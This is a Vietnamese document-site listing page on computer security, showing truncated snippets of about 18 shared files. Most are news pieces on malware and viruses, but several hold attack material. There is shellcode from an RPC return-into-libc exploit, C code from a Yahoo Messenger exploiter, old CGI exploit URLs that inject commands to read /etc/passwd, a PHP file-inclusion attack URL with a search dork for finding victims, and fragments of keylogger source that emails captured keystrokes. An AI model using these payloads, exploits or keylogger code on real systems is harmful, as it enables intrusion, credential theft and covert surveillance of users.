« Home « Chủ đề bảo mật máy tính

Chủ đề : bảo mật máy tính


Có 180+ tài liệu thuộc chủ đề "bảo mật máy tính"

Lỗi của phpproxima, Remote File Access

tailieu.vn

Homepage : http://www.php­proxima.com/ . Một trong những cái thay đổi đó là php­proxima có chứa một file gọi là autohtml.php. include("mainfile.php". include("header.php". Một user có thể tránh include mainfile.php và chèn bất kỳ cái gì vào $name. +http://victim/autohtml.php?op=modload&mainfile=x&name=<local filename>. Có thể vào google tìm cũng có nhiều cho các bạn test:allinurl: /autohtml.php?op=

Đôi nét về Remote Networking

tailieu.vn

Khi người sử dụng cần truy cập các ứng dụng hoặc các file từ một vị trí ở xa thì bạn sẽ cài đặt 1 phần mềm hỗ trợ truy cập từ xa (remote control software) như PCAnywhere của Symantech , hoặc Reachout (hổng nhớ của hãng nào) or Laplink củaTraveling Software (không biết đúng không nữa) trên cả máy ...

Remote Yahoo Messenger V5.5 Exploiter

tailieu.vn

#include <windows.h>. #include <stdio.h>. #include <stdlib.h>. #include <string.h>. #include <stdio.h>. #include <winsock2.h>. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90". fprintf(stdout,"Creating index.html: ");. if ((fptr =fopen("index.html","w"))==NULL){. here whe make the index.html. %c>....</html>. closing index.html again. server.sin_family = AF_INET;. server.sin_port = htons(port);. server.sin_addr.s_addr = INADDR_ANY. memset(server.sin_zero,0,8. if ((he=gethostbyname(inet_ntoa(client.sin_addr)))==NULL){. inet_ntoa(client.sin_addr),he­>h_name);. if ((fptr =fopen("index.html","r"))==NULL){

Rpc Remote Returnintolibc Exploit

tailieu.vn

\x90\x90 before the shellcode replaced with \xcd\x21. "\x90\x90\x90\x90". "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90". "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90". "\x83\xec\x34\x8b\xf4\xe8\x47\x01\x00\x00\x89\x06\xff\x36\x68\x8e". "\x4e\x0e\xec\xe8\x61\x01\x00\x00\x89\x46\x08\xff\x36\x68\xad\xd9". "\x05\xce\xe8\x52\x01\x00\x00\x89\x46\x0c\x68\x6c\x6c\x00\x00\x68". "\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\x56\x08\x89\x46\x04". "\xff\x36\x68\x72\xfe\xb3\x16\xe8\x2d\x01\x00\x00\x89\x46\x10\xff". "\x36\x68\xef\xce\xe0\x60\xe8\x1e\x01\x00\x00\x89\x46\x14\xff\x76". "\x04\x68\xcb\xed\xfc\x3b\xe8\x0e\x01\x00\x00\x89\x46\x18\xff\x76". "\x04\x68\xd9\x09\xf5\xad\xe8\xfe\x00\x00\x00\x89\x46\x1c\xff\x76". "\x04\x68\xa4\x1a\x70\xc7\xe8\xee\x00\x00\x00\x89\x46\x20\xff\x76". "\x04\x68\xa4\xad\x2e\xe9\xe8\xde\x00\x00\x00\x89\x46\x24\xff\x76". "\x04\x68\xe5\x49\x86\x49\xe8\xce\x00\x00\x00\x89\x46\x28\xff\x76". "\x04\x68\xe7\x79\xc6\x79\xe8\xbe\x00\x00\x00\x89\x46\x2c\x33\xff". "\x81\xec\x90\x01\x00\x00\x54\x68\x01\x01\x00\x00\xff\x56\x18\x50". "\x00\x1c\x07\x8b\xcc\x6a\x16\x51\x53\xff\x56\x20\x57\x53\xff\x56". "\x24\x57\x51\x53\xff\x56\x28\x8b\xd0\x68\x65\x78\x65\x00\x68\x63". "\x50\x51\x51\x51\x6a\x01\x51\x51\xff\x76\x30\x51\xff\x56\x10\x8b". "\xcc\x6a\xff\xff\x31\xff\x56\x0c\x8b\xc8\x57\xff\x56\x2c\xff\x56". "\x14\x55\x56\x64\xa1\x30\x00\x00\x00\x85\xc0\x78\x0c\x8b\x40\x0c". "\x00\x00\x8b\xc5\x5e\x5d\xc2\x04\x00\x53\x55\x56\x57\x8b\x6c\x24". "\x00\x90\x90\x90\x80\xbf\x32\x94\x80\xbf\x32\x94";. rets.type=0x3000;. rets.prot=0x4;. rets.newprot=0x20;. rets.valloc=targets[id].valloc;. rets.amemcpy=targets[id].amemcpy;. rets.vprot=targets[id].vprot;. fr1.ret=rets.ret1=rets.ret2=targets[id].ret;. fr1.frame0=targets[id].frame;. rets.frame1=fr1.frame0+9*4;. rets.frame2=rets.frame1+6*4;. rets.oldprot=fr1.frame0;. rets.frame3=rets.frame1;. rets.size2=sizeof(shell);. rets.src=fr1.frame0;. rets.dest=0x55555000;. rets.ret3=0x5555506c;. rets.dummy1=rets.dummy2=0xffffffff;. rets.zero=0;. rets.pointer11=fr1.frame0+92;. rets.pointer12=fr1.frame0+96;. rets.pointer21=fr1.frame0+100;. rets.pointer22=fr1.frame0+104;. Connection lost..\n");. printf("%d\t%s\n",i,targets[i].description). printf("Exploiting %s...\n",argv[1]);. sin.sin_port=htons(135);. sin.sin_port = ...

Săn tên miền – thú tiêu khiển mới của hacker!

tailieu.vn

domain name (tên miền). Những site trên đều đăng ký domain name tại Enom, nhà cung cấp domain name nổi tiếng trên thế giới. săn domain name.. Những kẻ săn domain name. Cộng đồng Internet VN rơi vào tình trạng vô cùng hỗn loạn bởi vì domain name của các website cứ đội nón ra đi, đến nỗi unknown, biệt ...

Show & Kill Processes

tailieu.vn

(ByVal hwnd As Long, ByVal wCmd As Long) As Long Private Declare Function GetParent Lib "user32". (ByVal hwnd As Long) As Long. (ByVal hwnd As Long) As Long Private Declare Function GetWindowText Lib "user32". (ByVal hwnd As Long, ByVal _ lpString As String, ByVal cch As Long) As Long. (ByVal lpClassName As String, ByVal lpWindowName As String) As Long. ByVal ...

Site hack đầu tay

tailieu.vn

Có nhiều bạn thắc mắc Hack trang Web là gì ? và phải Hack làm sao. Hack một Website có rất nhiều cách mà đa số là Hacker dựa vào các lỗ hổng bảo mật như : IIS, Hosting Controller, Buffer Overflow. Có rất nhiều bài dạy về Hack Web nhưng đây là bài căn bản và dễ hiểu nhất, ...

Some old Bug on Server

tailieu.vn

campas.cgi http://IP//cgi-bin/campas?%0acat%0a/etc/passwd%0a faxsurvey.cgi http://IP/cgi-bin/faxsurvery?/bin/cat%20/etc/passwd IIS4 http://IP/scripts/iisadmin/ism.dll?http/dir. MetaIP 2 http://www.victim.com winnt/system32/net.exe?use%20 nph-test.cgi http://IP/cgi-bin/nph-test.cgi?*. nph-test.cgi http://IP/cgi-bin/nph-test.cgi?/*. phf.cgi http://IP/cgi-bin/phf?Qalias=x%0a/bin/cat/%20/etc/passwd php.cgi http://IP/cgi-bin/php.cgi?/etc/passwd. test-cgi http://IP/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd test-cgi 2 GET /cgi-bin/test-cgi?/*. webdist.cgi http://IP/webdist.cgi?distloc=;/bin/cat%20/etc/passwd

Sql Inject nâng cao

tailieu.vn

 Các bạn thử xem một câu truy vấn SQL:. thì 'id','forename' và 'surname' là column của table author,khi câu truy vấn trên làm việc thì nó sẽ cho kết quả tất cã các dòng trong table author.Xem câu truy vấn sau:. Đây là câu truy vấn có điều kiện chắc không nói các bạn cũng biết,nó cho ra kết quả ...

SQL Injection

tailieu.vn

Bằng cách inject các mã SQL query/command vào input trước khi chuyển cho ứng dụng web xử lí, bạn có thể login mà không cần username và password, remote execution, dump data và lấy root của SQL server. Bạn có thể search các trang web cho phép submit data ở bất kì một search­engine nào trên mạng, chẳng hạn như ...

Chương Trình Supperkeylogger

tailieu.vn

Form chính có tên là Form1.frm:. Form1.send.Text . Form1.send.Text = Form1.send.Text &. Form1.SendEMail (path) Kill path. &H1) Then Form1.Text1 = Form1.Text1 + "A". &H1) Then Form1.Text1 = Form1.Text1 + "a". &H1) Then Form1.Text1 = Form1.Text1 + "B". &H1) Then Form1.Text1 = Form1.Text1 + "b". &H1) Then Form1.Text1 = Form1.Text1 + "C". &H1) Then Form1.Text1 = Form1.Text1 + "c". &H1) Then...

Tại sao người ta viết virus máy tính ? Niềm đam mê Hay bệnh nghề nghiệp

tailieu.vn

Tại sao người ta viết virus máy tính ? Niềm đam mê Hay bệnh nghề nghiệp.  Hàng triệu máy tính và mạng đã bị hạ gục bởi đủ loại virus khác nhau trong những năm qua. Theo Sarah Gordon, chuyên gia nổi tiếng về worm máy tính và an ninh hệ thống, tác giả virus thuộc mọi lứa tuổi, mức ...

Crack ! còn ngày mai của công nghiệp phần mềm Việt Nam ?

tailieu.vn

Crack ! còn ngày mai của công nghiệp phần mềm Việt Nam ? trang này đã được đọc lần . Với một số bạn trẻ, khóa bảo vệ các sản phẩm phần mềm là sự thách thức khả năng của họ, việc bẻ các khóa này vừa như một phương thức tìm tòi cơ hội rèn luyện tri thức, kỹ ...

Hướng dẫn phá pass tất cả windows

tailieu.vn

Download Hiren's Boot CD 10.5 - H ướ ng d n phá password khi quên m t kh u đăng nh p ẫ ậ ẩ ậ Windows 7. Hiren's Boot CD là m t công c không th thi u cho nh ng ai s a ch a, kh c ộ ụ ể ế ữ ử ữ ắ ph c...

Malware lợi dụng Smartphone Android như những Botnet

tailieu.vn

Malware lợi dụng Smartphone Android như những Botnet. Tin tặc đang nhắm đến các di động chạy Android với mục đích biến chúng thành những Botnet với máy chủ điều khiển từ xa và bắt đầu thu thập dữ liệu của nạn nhân.. Một trong số đó là "Geinimi", có vẻ như đây là một trong những Malware đầu tiên...

8 nỗi ám ảnh liên quan đến công nghệ của thập kỷ

tailieu.vn

8 nỗi ám ảnh liên quan đến công nghệ của thập kỷ. 10 năm qua, người sử dụng máy tính đã vài lần chứng kiến những nguy cơ, mối đe dọa có sức phát tán và tầm ảnh hưởng lên toàn thế giới.. Tuy nhiên, theo trang PC World, thực tế cho thấy những sự cố này đều chưa đạt...

Tuyển tập virus năm 2010 từ Panda Labs

tailieu.vn

Virus này chỉ hoạt động trên hệ điều hành Mac và cần sự cho phép của người dùng để cài đặt trên máy tính. Sâu máy tính này tạo ra một lỗ hổng ở Microsoft USB và có một mục đích duy nhất là âm thầm thao túng hạt nhân của hệ điều hành này.. Oscarbot.YQ là một dạng virus...

Những nơi nguy hiểm nhất trên Web- P1

tailieu.vn

Những nơi nguy hiểm nhất trên Web. Internet là nơi nguy hiểm và bạn dễ dàng “rơi vào bẫy” của tin tặc nếu không biết tự trang bị các biện pháp bảo vệ mình. Tuy nhiên, dù bạn đã trang bị mọi thứ phòng vệ mà vẫn bị nhiễm malware, lừa đảo qua mạng hay bị thâm nhập vào dữ...

Những nơi nguy hiểm nhất trên Web- P2

tailieu.vn

Các trang web tải về video. Các tập tin video chứa mã độc được dùng khai thác lỗ hổng trong phần mềm nghe nhạc nhằm chiếm quyền kiểm soát máy tính.. Thời gian qua, tin tặc thường thông qua lỗ hổng trên trình xem video như QuickTime Player để tấn công vào máy tính người dùng. Virus biến thể thành...

2011: malware chuyển từ máy tính sang... túi quần

tailieu.vn

2011: malware chuyển từ máy tính sang.... Dự đoán phần mềm độc hại di động tăng đột biến đang trở thành hiện thực do việc sử dụng rộng rãi smartphone thế hệ mới chạy các hệ điều hành tiên tiến.. Mặc dù các dự đoán đã khá phổ biến trong 6 năm qua và cho dù chúng không được mong...